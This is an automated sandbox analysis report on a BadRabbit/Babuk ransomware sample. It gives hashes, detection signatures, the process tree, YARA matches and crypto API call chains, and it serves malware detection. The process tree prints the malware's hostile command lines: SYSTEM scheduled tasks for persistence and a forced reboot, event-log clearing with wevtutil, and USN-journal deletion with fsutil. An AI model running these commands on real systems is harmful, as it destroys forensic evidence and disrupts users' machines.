Windows Analysis Report
LisectAVT_2403002C_35.exe

Overview

General Information

Sample name: LisectAVT_2403002C_35.exe
Analysis ID: 1481356
MD5: d7ad0cdda235608cb4afb702562fdcfd
SHA1: 358699a2bc63d26030f88b6287b07aaeb69680c5
SHA256: 06d269411d74cbc6026eab2776a7cded68dd3380b7e1b890f15d2210d2ff376f
Tags: exe

Detection

Babuk, Mimikatz, TrojanRansom
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Execute DLL with spoofed extension
System process connects to network (likely due to code injection or exploit)
Yara detected Babuk Ransomware
Yara detected Mimikatz
Yara detected TrojanRansom
AI detected suspicious sample
Changes security center settings (notifications, updates, antivirus, firewall)
Clears the journal log
Clears the windows event log
Contains functionality to create processes via WMI
Contains functionality to enumerate network shares of other devices
Contains functionality to infect the boot sector
Contains functionality to register a low level keyboard hook
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking computer name)
Found evasive API chain (may stop execution after checking mutex)
Query firmware table information (likely to detect VMs)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Schtasks Creation Or Modification With SYSTEM Privileges
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Eventlog Clear or Configuration Change
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query network adapter information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables security privileges
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file name is different from the original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Spawns drivers
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • LisectAVT_2403002C_35.exe (PID: 6328 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002C_35.exe" MD5: D7AD0CDDA235608CB4AFB702562FDCFD)
    • conhost.exe (PID: 5736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 4828 cmdline: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15 MD5: 889B99C52A60DD49227C5E485A016679)
      • cmd.exe (PID: 3216 cmdline: /c schtasks /Delete /F /TN rhaegal MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 3712 cmdline: schtasks /Delete /F /TN rhaegal MD5: 48C2FE20575769DE916F48EF0676A965)
      • cmd.exe (PID: 7352 cmdline: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7480 cmdline: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit" MD5: 48C2FE20575769DE916F48EF0676A965)
      • cmd.exe (PID: 7388 cmdline: /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 02:36:00 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7496 cmdline: schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 02:36:00 MD5: 48C2FE20575769DE916F48EF0676A965)
      • D99F.tmp (PID: 7440 cmdline: "C:\Windows\D99F.tmp" \\.\pipe\{0196DA97-052C-4D78-8175-28281F8F1CD9} MD5: 347AC3B6B791054DE3E5720A7144A977)
        • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7604 cmdline: /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C: MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wevtutil.exe (PID: 7644 cmdline: wevtutil cl Setup MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • wevtutil.exe (PID: 7660 cmdline: wevtutil cl System MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • wevtutil.exe (PID: 7680 cmdline: wevtutil cl Security MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • wevtutil.exe (PID: 7716 cmdline: wevtutil cl Application MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • fsutil.exe (PID: 7732 cmdline: fsutil usn deletejournal /D C: MD5: 452CA7574A1B2550CD9FF83DDBE87463)
      • cmd.exe (PID: 8032 cmdline: /c schtasks /Delete /F /TN drogon MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 8128 cmdline: schtasks /Delete /F /TN drogon MD5: 48C2FE20575769DE916F48EF0676A965)
  • svchost.exe (PID: 5640 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 5768 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 5816 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7144 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6976 cmdline: C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7096 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7292 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cmd.exe (PID: 7804 cmdline: C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 1283680486 && exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dispci.exe (PID: 7868 cmdline: "C:\Windows\dispci.exe" -id 1283680486 MD5: B14D8FAF7F0CBCFAD051CEFE5F39645F)
      • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7924 cmdline: /c schtasks /Delete /F /TN rhaegal MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 8008 cmdline: schtasks /Delete /F /TN rhaegal MD5: 48C2FE20575769DE916F48EF0676A965)
  • svchost.exe (PID: 7948 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • LogonUI.exe (PID: 8052 cmdline: "LogonUI.exe" /flags:0x4 /state0:0xa3f80855 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
  • svchost.exe (PID: 8188 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5504 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cdd.dll (PID: 4 cmdline: MD5: 9B684213A399B4E286982BDAD6CF3D07)
  • fontdrvhost.exe (PID: 5140 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
  • LogonUI.exe (PID: 7756 cmdline: "LogonUI.exe" /flags:0x2 /state0:0xa3f8d855 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
  • cdd.dll (PID: 4 cmdline: MD5: 9B684213A399B4E286982BDAD6CF3D07)
  • fontdrvhost.exe (PID: 760 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
  • cleanup
Name: Babuk
Description: Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time as well. It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk

Name: MimiKatz
Description: Varonis summarizes Mimikatz as an open-source application that allows users to view and save authentication credentials like Kerberos tickets. Benjamin Delpy continues to lead Mimikatz developments, so the toolset works with the current release of Windows and includes the most up-to-date attacks. Attackers commonly use Mimikatz to steal credentials and escalate privileges: in most cases, endpoint protection software and anti-virus systems will detect and delete it. Conversely, pentesters use Mimikatz to detect and exploit vulnerabilities in your networks so you can fix them.
Attribution:
  • APT32
  • Anunak
  • GALLIUM
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz
No configs have been found
Source: LisectAVT_2403002C_35.exe | Rule: BadRabbit_Gen | Description: Detects BadRabbit Ransomware | Author: Florian Roth | Strings:
  • 0x6114:$x3: C:\Windows\infpub.dat
  • 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws

Source: C:\Windows\cscc.dat | Rule: INDICATOR_TOOL_ENC_DiskCryptor | Description: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions | Author: ditekSHen | Strings:
  • 0x2b3d8:$d1: \DosDevices\dcrypt
  • 0x2b488:$d2: $dcsys$_fail_%x
  • 0x2b468:$d3: %s\$DC_TRIM_%x$
  • 0x2b3b8:$d4: \Device\dcrypt
  • 0x2b420:$d5: %s\$dcsys$

Source: C:\Windows\dispci.exe | Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 | Description: Bad Rabbit Ransomware | Author: Christiaan Beek | Strings:
  • 0x148a0:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
  • 0x1b1bd:$x2: need to do is submit the payment and get the decryption password.
  • 0x1f30d:$x2: need to do is submit the payment and get the decryption password.
  • 0x1b40a:$s3: If you have already got the password, please enter it below.
  • 0x1f55a:$s3: If you have already got the password, please enter it below.
  • 0x2130c:$s4: dispci.exe
  • 0x14500:$s5: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
  • 0x1b53f:$s6: Run DECRYPT app at your desktop after system boot
  • 0x1f68f:$s6: Run DECRYPT app at your desktop after system boot
  • 0x147b8:$s7: Enter password#1:
  • 0x14676:$s8: Enter password#2:
  • 0x14430:$s9: C:\Windows\cscc.dat
  • 0x14940:$s10: schtasks /Delete /F /TN %ws
  • 0x1b448:$s11: Password#1:
  • 0x1f598:$s11: Password#1:
  • 0x14398:$s12: \AppData
  • 0x14650:$s13: Readme.txt
  • 0x14752:$s14: Disk decryption completed
  • 0x146ca:$s15: Files decryption completed
  • 0x212b4:$s16: http://diskcryptor.net/
  • 0x1b235:$s17: Your personal installation key#1:

Source: C:\Windows\dispci.exe | Rule: BadRabbit_Gen | Description: Detects BadRabbit Ransomware | Author: Florian Roth | Strings:
  • 0x148a0:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST
  • 0x14430:$x4: C:\Windows\cscc.dat
  • 0x1b1bd:$s1: need to do is submit the payment and get the decryption password.
  • 0x1f30d:$s1: need to do is submit the payment and get the decryption password.
  • 0x14500:$s2: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
  • 0x1b53f:$s5: Run DECRYPT app at your desktop after system boot
  • 0x1f68f:$s5: Run DECRYPT app at your desktop after system boot
  • 0x146ca:$s6: Files decryption completed
  • 0x145ea:$s7: Disable your anti-virus and anti-malware programs
Source: 00000003.00000003.1276632248.0000000004D91000.00000004.00000020.00020000.00000000.sdmp | Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 | Description: Bad Rabbit Ransomware | Author: Christiaan Beek | Strings:
  • 0x138e8:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
  • 0x1a205:$x2: need to do is submit the payment and get the decryption password.
  • 0x1e355:$x2: need to do is submit the payment and get the decryption password.
  • 0x1a452:$s3: If you have already got the password, please enter it below.
  • 0x1e5a2:$s3: If you have already got the password, please enter it below.
  • 0x20354:$s4: dispci.exe
  • 0x13548:$s5: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
  • 0x1a587:$s6: Run DECRYPT app at your desktop after system boot
  • 0x1e6d7:$s6: Run DECRYPT app at your desktop after system boot
  • 0x13800:$s7: Enter password#1:
  • 0x136be:$s8: Enter password#2:
  • 0x13478:$s9: C:\Windows\cscc.dat
  • 0x13988:$s10: schtasks /Delete /F /TN %ws
  • 0x1a490:$s11: Password#1:
  • 0x1e5e0:$s11: Password#1:
  • 0x133e0:$s12: \AppData
  • 0x13698:$s13: Readme.txt
  • 0x1379a:$s14: Disk decryption completed
  • 0x13712:$s15: Files decryption completed
  • 0x202fc:$s16: http://diskcryptor.net/
  • 0x1a27d:$s17: Your personal installation key#1:

Source: Process Memory Space: rundll32.exe PID: 4828 | Rule: JoeSecurity_babuk | Description: Yara detected Babuk Ransomware | Author: Joe Security
Source: Process Memory Space: rundll32.exe PID: 4828 | Rule: JoeSecurity_TrojanRansom | Description: Yara detected TrojanRansom | Author: Joe Security
Source: Process Memory Space: dispci.exe PID: 7868 | Rule: JoeSecurity_babuk | Description: Yara detected Babuk Ransomware | Author: Joe Security

Source: 0.2.LisectAVT_2403002C_35.exe.510000.0.unpack | Rule: BadRabbit_Gen | Description: Detects BadRabbit Ransomware | Author: Florian Roth | Strings:
  • 0x6114:$x3: C:\Windows\infpub.dat
  • 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws

Source: 3.3.rundll32.exe.32943b8.2.unpack | Rule: INDICATOR_TOOL_ENC_DiskCryptor | Description: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions | Author: ditekSHen | Strings:
  • 0x2a1d8:$d1: \DosDevices\dcrypt
  • 0x2a288:$d2: $dcsys$_fail_%x
  • 0x2a268:$d3: %s\$DC_TRIM_%x$
  • 0x2a1b8:$d4: \Device\dcrypt
  • 0x2a220:$d5: %s\$dcsys$

Source: 3.3.rundll32.exe.32943b8.1.unpack | Rule: INDICATOR_TOOL_ENC_DiskCryptor | Description: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions | Author: ditekSHen | Strings:
  • 0x2a1d8:$d1: \DosDevices\dcrypt
  • 0x2a288:$d2: $dcsys$_fail_%x
  • 0x2a268:$d3: %s\$DC_TRIM_%x$
  • 0x2a1b8:$d4: \Device\dcrypt
  • 0x2a220:$d5: %s\$dcsys$

Source: 0.2.LisectAVT_2403002C_35.exe.ede2e0.1.unpack | Rule: BadRabbit_Gen | Description: Detects BadRabbit Ransomware | Author: Florian Roth | Strings:
  • 0x5514:$x3: C:\Windows\infpub.dat
  • 0x5558:$s10: %ws C:\Windows\%ws,#1 %ws

Source: 19.0.D99F.tmp.7ff609750000.0.unpack | Rule: JoeSecurity_Mimikatz_2 | Description: Yara detected Mimikatz | Author: Joe Security

System Summary

Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", CommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 4828, ParentProcessName: rundll32.exe, ProcessCommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", ProcessId: 7352, ProcessName: cmd.exe
Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", CommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 4828, ParentProcessName: rundll32.exe, ProcessCommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", ProcessId: 7352, ProcessName: cmd.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", CommandLine: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7352, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", ProcessId: 7480, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", CommandLine: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7352, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit", ProcessId: 7480, ProcessName: schtasks.exe
Source: Process started | Author: Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105 | Data: Command: wevtutil cl Setup, CommandLine: wevtutil cl Setup, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wevtutil.exe, NewProcessName: C:\Windows\SysWOW64\wevtutil.exe, OriginalFileName: C:\Windows\SysWOW64\wevtutil.exe, ParentCommandLine: /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7604, ParentProcessName: cmd.exe, ProcessCommandLine: wevtutil cl Setup, ProcessId: 7644, ProcessName: wevtutil.exe
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\cdd.dll, NewProcessName: C:\Windows\System32\cdd.dll, OriginalFileName: C:\Windows\System32\cdd.dll, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: cdd.dll
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 5640, ProcessName: svchost.exe

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, CommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002C_35.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002C_35.exe, ParentProcessId: 6328, ParentProcessName: LisectAVT_2403002C_35.exe, ProcessCommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, ProcessId: 4828, ProcessName: rundll32.exe

No Snort rule has matched

Timestamp: 2024-07-25T08:19:02.999617+0200 | SID: 2840787 | Source Port: 49710 | Destination Port: 443 | Protocol: TCP | Classtype: Potentially Bad Traffic
Timestamp: 2024-07-25T08:19:07.858858+0200 | SID: 2022930 | Source Port: 443 | Destination Port: 49722 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 2024-07-25T08:19:03.471374+0200 | SID: 2028371 | Source Port: 49713 | Destination Port: 443 | Protocol: TCP | Classtype: Unknown Traffic
Timestamp: 2024-07-25T08:19:44.974242+0200 | SID: 2022930 | Source Port: 443 | Destination Port: 49747 | Protocol: TCP | Classtype: A Network Trojan was detected

AV Detection

Source: LisectAVT_2403002C_35.exe | Avira: detected
Source: C:\Windows\dispci.exe | Avira: detection malicious, Label: TR/Diskcoder.12354
Source: C:\Windows\dispci.exe | ReversingLabs: Detection: 95%
Source: LisectAVT_2403002C_35.exe | ReversingLabs: Detection: 86%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 95.6% probability
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF6299 CreateEventW,CreateThread,WaitForSingleObject,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,CloseHandle,LocalFree,3_2_04BF6299
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF6085 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDestroyHash,3_2_04BF6085
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF5613 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportPublicKeyInfo,LocalFree,LocalFree,3_2_04BF5613
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF5A73 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,LocalFree,CryptDestroyHash,UnmapViewOfFile,3_2_04BF5A73
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF15A7 GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,HeapAlloc,CryptAcquireContextW,GetProcessHeap,HeapAlloc,CryptImportKey,CryptCreateHash,CryptSetHashParam,GetProcessHeap,HeapFree,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_04BF15A7
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF5BC4 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,memcpy,FlushViewOfFile,LocalFree,CryptDestroyHash,UnmapViewOfFile,3_2_04BF5BC4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF5D0A CryptDuplicateKey,CreateFileW,GetFileSizeEx,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,CreateFileMappingW,MapViewOfFile,CryptEncrypt,FlushViewOfFile,UnmapViewOfFile,FindCloseChangeNotification,FindCloseChangeNotification,CryptDestroyKey,SetEvent,3_2_04BF5D0A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF5507 CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,3_2_04BF5507
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF554A CryptAcquireContextW,GetLastError,CryptGenRandom,CryptReleaseContext,3_2_04BF554A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF56D8 CryptEncrypt,CryptEncrypt,LocalAlloc,memcpy,CryptEncrypt,LocalFree,3_2_04BF56D8
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF6246 CryptCreateHash,CryptHashData,CryptGetHashParam,3_2_04BF6246
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF559B CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,CryptGetKeyParam,LocalAlloc,CryptSetKeyParam,LocalFree,3_2_04BF559B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BF5780 CryptBinaryToStringW,CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,3_2_04BF5780
Source: C:\Windows\dispci.exe | Code function: 32_2_00A842A0 VirtualAlloc,VirtualLock,GetCurrentThreadId,GetCurrentThreadId,SetWindowsHookExW,SetWindowsHookExW,GetCurrentThreadId,SetWindowsHookExW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,32_2_00A842A0
